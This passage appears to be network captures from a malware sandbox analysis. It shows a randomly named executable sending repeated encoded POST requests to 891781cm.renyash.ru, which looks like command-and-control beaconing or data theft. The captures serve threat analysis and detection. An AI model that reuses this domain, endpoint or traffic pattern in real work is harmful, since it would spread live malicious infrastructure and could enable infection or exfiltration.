                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9LUvxpzy29HbaaJ%2FxowuLqTnpVjwfOMmjV9o%2BJwLsbJWax1e8ckxXTlpkEgna9Dm278xp65H3OC9Ky8%2FWmYounRf%2BKDhRsNhE81EbhrBwWCooba6W6LXFbktJsKRsEE1%2F3m2ITEs"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bcabff443b7-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=10061&min_rtt=8916&rtt_var=5634&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=80747&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.449745104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:16.560880899 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:16.915397882 CET1072OUTData Raw: 55 5f 58 50 5f 5a 51 58 55 5a 54 59 51 5f 55 50 58 5f 5c 5d 59 57 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U_XP_ZQXUZTYQ_UPX_\]YWR_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ <71X$>(.3$U97'"'/<,> ]<.$W><#^!'^)7
                                                                                                                  Jan 1, 2025 15:02:17.023051023 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:17.270081997 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:17 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wfVyEqTyFDm0GHZJ6ZP4%2FcuO6wWfMQ8AcK4GsM%2FEIc3LpZFjDBB%2FE7MJhvvhCVU7ssgpTp1Ey0he0LcutzGHIvNKuEtXtZyDZbfDPXQc6zxDNVRmzK1%2B2rZPBQVNZN1Dy3UGtP3t"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bd01870de98-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3079&min_rtt=1469&rtt_var=3772&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=101699&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.449748104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:17.407289028 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:17.760162115 CET1072OUTData Raw: 55 5e 5d 56 5a 58 54 59 55 5a 54 59 51 59 55 57 58 53 5c 59 59 57 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U^]VZXTYUZTYQYUWXS\YYWR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ X?64_&X5=,'"V-$1&,<,X ]<>#^!'^)/
                                                                                                                  Jan 1, 2025 15:02:17.867383957 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:18.122817039 CET813INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:18 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=knAnz8QKx%2BfZUte7eu%2F2LR6yRkfhLEghy7iDISQqMnNKovcFkfeCZwNOlqcHQnsiGqT%2F8HCcAx%2BhA4m65P74iXIKM%2B3Y8vyAg5R6VntOXMiQ8OLpTncPOWL%2BleEdCEDCA%2FDFEHjj"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bd56a9f183d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2781&min_rtt=1486&rtt_var=3148&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=123206&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  10192.168.2.449751104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:18.595827103 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  11192.168.2.449752104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:18.641189098 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:18.993779898 CET1072OUTData Raw: 55 53 5d 50 5f 5c 51 5a 55 5a 54 59 51 5f 55 56 58 52 5c 5b 59 55 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: US]P_\QZUZTYQ_UVXR\[YURX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ?* 1!\>+'B!:'310Z,/7(>'=#^!'^)7
                                                                                                                  Jan 1, 2025 15:02:19.084362984 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:19.353039980 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:19 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=43PlzUc%2BZcziSzMFRSztFqasOyczDaJhBAzaSlCIys0fim0WqtzbaogYNnwblc8leXuMH6fh3nvIgEW4%2F5%2FHVjKU1oe5xH6O2H0Nh9NdvlI9pWaidDsL12CZKRpOGINyO%2BOITWhV"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bdcfd3c19cb-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2104&min_rtt=2025&rtt_var=917&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=549285&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  12192.168.2.449753104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:19.498711109 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:19.853215933 CET1072OUTData Raw: 50 52 5d 57 5f 5c 51 55 55 5a 54 59 51 52 55 53 58 5a 5c 5b 59 5d 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PR]W_\QUUZTYQRUSXZ\[Y]R_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ X?2 +&.Z(=30$..$_3?.'/3^;=;<=8T(,#^!'^)
                                                                                                                  Jan 1, 2025 15:02:19.963844061 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:20.223815918 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:20 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8TmyQlfGM1mfLG6RB%2BdFwE8kVNnOvjo%2B%2FnsKdlYD1MRAbICXb8wZ1rGryz80y8de2ay54eEF7tXM6WTHf2c%2FZb%2FdTt0GCbpwBHgGcVS3FH90sd4BiUmKSAp0KFkNanFljLW0Pk3H"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30be27a1ac43b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2792&min_rtt=1520&rtt_var=3115&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=124786&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0
                                                                                                                  Jan 1, 2025 15:02:20.464600086 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:20 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8TmyQlfGM1mfLG6RB%2BdFwE8kVNnOvjo%2B%2FnsKdlYD1MRAbICXb8wZ1rGryz80y8de2ay54eEF7tXM6WTHf2c%2FZb%2FdTt0GCbpwBHgGcVS3FH90sd4BiUmKSAp0KFkNanFljLW0Pk3H"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30be27a1ac43b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2792&min_rtt=1520&rtt_var=3115&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=124786&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  13192.168.2.449754104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:20.465764046 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1064
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:20.909554005 CET1064OUTData Raw: 55 57 58 57 5f 5e 51 59 55 5a 54 59 51 5b 55 5c 58 58 5c 59 59 57 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UWXW_^QYUZTYQ[U\XX\YYWR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ^(![4+%&[*>4'2,7+'/53,?;><?$R(,#^!'^)
                                                                                                                  Jan 1, 2025 15:02:20.918656111 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:21.261053085 CET816INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d%2BYsHNAH7w4eDWU4KvbiE3jV%2Bp3UAFVSi%2FK9GdQlgoYzWFb%2FrQQ7OLutFY4kO4K9V%2BJb2tuDK6KGBjCK2qSED0%2B8DMX7Jn%2BmxsK2DCalD4mYoq1IvFz%2BJPlLjH48%2FEhzs6e32plv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30be879404225-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4399&min_rtt=1647&rtt_var=6122&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1384&delivery_rate=61689&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  14192.168.2.449755104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:21.396924973 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:21.743516922 CET1072OUTData Raw: 55 57 58 5c 5a 5a 54 5e 55 5a 54 59 51 59 55 51 58 5e 5c 5e 59 50 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UWX\ZZT^UZTYQYUQX^\^YPR\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+)Y489^1>>).'$"U9$%,"Q0?,8=8+>4W=,#^!'^)/
                                                                                                                  Jan 1, 2025 15:02:21.868206024 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:22.127341986 CET811INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:22 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v1591yoXRq4S%2Fgu%2B46%2BqF5XZp7beMML%2BjZX7Zl%2FAAz2ZaP4z6EWg2ZzRT7%2FdqEF33YnTQjLhTh2Nzw4OHIa0oT51Mgv3JCnJnlG9camjgf9pgKc8cyES3EqK4QBYm1guD4Pu4tNS"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bee5cf8430f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3170&min_rtt=1665&rtt_var=3635&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=106507&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  15192.168.2.449756104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:22.264643908 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:22.618623018 CET1072OUTData Raw: 50 56 58 51 5f 5e 51 59 55 5a 54 59 51 5e 55 57 58 59 5c 59 59 51 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PVXQ_^QYUZTYQ^UWXY\YYQR\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ (Y1!8.&6>^$>V9#$Y*P3/8,>+< =,#^!'^)3
                                                                                                                  Jan 1, 2025 15:02:22.708975077 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:22.975405931 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:22 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n%2F3KeQBaNFIzR86D5N09Ca6RaDaaucghpClGtgfU8IHF%2B3yxbh%2FPrp35fP8DYcVZ3rsWopFyChlxq4EnzQRhWwz4v8SHqxOhe4wKSyyEwAeQsmmy%2Fj15EuHVDU%2BBMoQaX8kBMgAa"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bf3a9d28c18-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2157&min_rtt=1965&rtt_var=1121&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=417023&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  16192.168.2.449757104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:23.138154984 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:23.493690014 CET1072OUTData Raw: 50 51 58 53 5f 5e 54 5f 55 5a 54 59 51 5c 55 52 58 5d 5c 5b 59 50 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PQXS_^T_UZTYQ\URX]\[YPRS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#),5#+-X%:)Z0B&94<\$<!'//Z/.<>*<#^!'^)
                                                                                                                  Jan 1, 2025 15:02:23.588295937 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  17192.168.2.449758104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:23.783795118 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:24.135597944 CET1796OUTData Raw: 55 5f 58 5c 5a 56 51 5f 55 5a 54 59 51 5e 55 57 58 59 5c 5e 59 52 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
